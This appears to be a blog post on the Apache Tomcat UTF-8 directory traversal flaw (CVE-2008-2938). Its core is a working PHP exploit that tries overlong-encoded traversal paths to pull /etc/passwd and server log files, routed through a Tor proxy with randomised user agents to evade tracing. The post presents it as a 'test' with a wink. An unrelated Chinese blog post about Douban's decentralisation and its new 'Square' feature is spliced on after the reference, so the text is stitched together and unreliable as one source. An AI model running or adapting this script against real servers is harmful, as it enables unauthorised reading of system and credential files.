You might have seen the new Apache Tomcat <= 6.0.18 vulnerability found by Simon Ryeo[1]. The vulnerability involved a problem in Tomcat with processing UTF-8 encoded URI's which resulted in a directory traversal and canonicalization issues while mapping the paths. If context.xml or server.xml allows 'allowLinking' and 'URIencoding' as 'UTF-8', directory traversal becomes possible. Curious enough this is pretty much de facto on *NIX systems. Ah the joy of standards! I don't know what is happening at Apache, but Tomcat is quite often vulnerable. It isn't the first time you see.

So let's exploit *cough* test it:

<?php



$url = "http://www.google.com";



$dir = array(

"%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/error_log",

"%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",

"%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error.log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",

"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/error_log"

);



function wrap($url){



$ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');

$op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');

$agent  = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';



        # proxy

        $tor = '127.0.0.1:8118';

        $timeout = '300';

        $ack = curl_init(); 

        curl_setopt ($ack, CURLOPT_PROXY, $tor); 

        curl_setopt ($ack, CURLOPT_URL, $url);

        curl_setopt ($ack, CURLOPT_HEADER, 1);  

        curl_setopt ($ack, CURLOPT_USERAGENT, $agent); 

        curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); 

        curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);

        curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);



        $syn = curl_exec($ack);

        $info = curl_getinfo($ack);

        curl_close($ack);

        

    if($info['http_code'] == '200') {

        return $syn;

        die();

      } else {

    return "Fail! :".$info['http_code']."\r\n";

  }

}





    for($i=0;$i<count($dir);$i++) {

       echo wrap($url.":8080/".$dir[$i]);

    }



?>

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938

二月份有关豆瓣去中心化的blog是这样结束的:

我们也在寻找热榜和最热评论的更有效的替代。豆瓣的第一用途是帮助你发现未知的东西。这是一件充满挑战的事情：完全没有广场地带的豆瓣会让我们的视野受限于个人已有兴趣和朋友的圈子兴趣；而一个所有人共享的广场也正在变得无用。我们已经有了不少想法，也对结果充满信心。这会是一个激动人心的变化过程，我已经等不及了。

过去半年里，豆瓣去中心化的脚步非常坚决：日记、相册、推荐、同城活动……都已经依靠友邻广播在传播。今天，一个成员只要有一两个活跃的朋友，即使没有首页和小组，他产生的内容也完全可以依靠友邻网络迅速地传播出去，吸引成百上千的读者。新的”友情小组”关系，也平衡了小组之间既要区隔又要交流的矛盾。

那么，”热榜和最热评论的更有效的替代”，我们找到了吗？

找到了。豆瓣马上会推出”广场”功能。

广场是豆瓣成员每日最关注热点内容的汇总：书、电影、音乐、评论、日记、相册、博客文章、活动。借助热点算法，最受豆瓣成员关注的内容将自动出现在广场里，定时更新。还没有朋友圈子的人、偶尔关心公共话题的人、或者想拓宽自己兴趣的人，都可以通过”广场”来迅速看到有用的内容，找到和自己志同道合的人。”广场”将取代豆瓣的很多东西：首页评论、各处”最受欢迎的评论”和九点各套。你可以认为广场是一个超级首页评论。

等等，这不是和”去中心化”背道而驰吗？上一篇里提到的种种热点弊端怎么办？好办。广场不在首页，而是最后一个导航菜单。你不想看热点，可以永远不去广场，关注自己的兴趣和圈子就可以。

更重要的是，广场不止一个。四个。四个广场，给四个不同的人群。你自己喜欢哪个，住进去就好了，别的广场你可以无视。这种”无视”也正是广场的设计初衷。

这样，舞文弄墨的夫子不必和呲牙咧嘴的后朋克互相鄙视，美剧达人也不用和美食大仙搅和不清。感觉豆瓣太热闹、同类被稀释的”老”用户可以有自己人群居的一角；每周呼朋唤友扫荡卖场的打折强迫症患者，也不会觉得一出小组就走错了地方。豆瓣是一座仁者见仁、智者见智的城市。

( 多个广场的想法沿用了豆瓣九点各套聚合的创意和技术沉淀。快两年了，九点”以人群而不是内容为分类”的聚合方式仍然是一个没有后来者的创新。不过广场会更直观，更强大。)

有了广场，豆瓣去中心化的过程才告一段落。对豆瓣这样以发现为目的的网站来说，完全以个人兴趣和友邻圈子为中心的设计是残缺的。广场是一个补充。但个人依然是豆瓣的第一中心。拿掉”最受欢迎的评论”之后，豆瓣的首页终于可以是纯粹的个人内容管理中心了，豆瓣的结构也才可以大大简化。不过这是下一篇blog要说的事情了。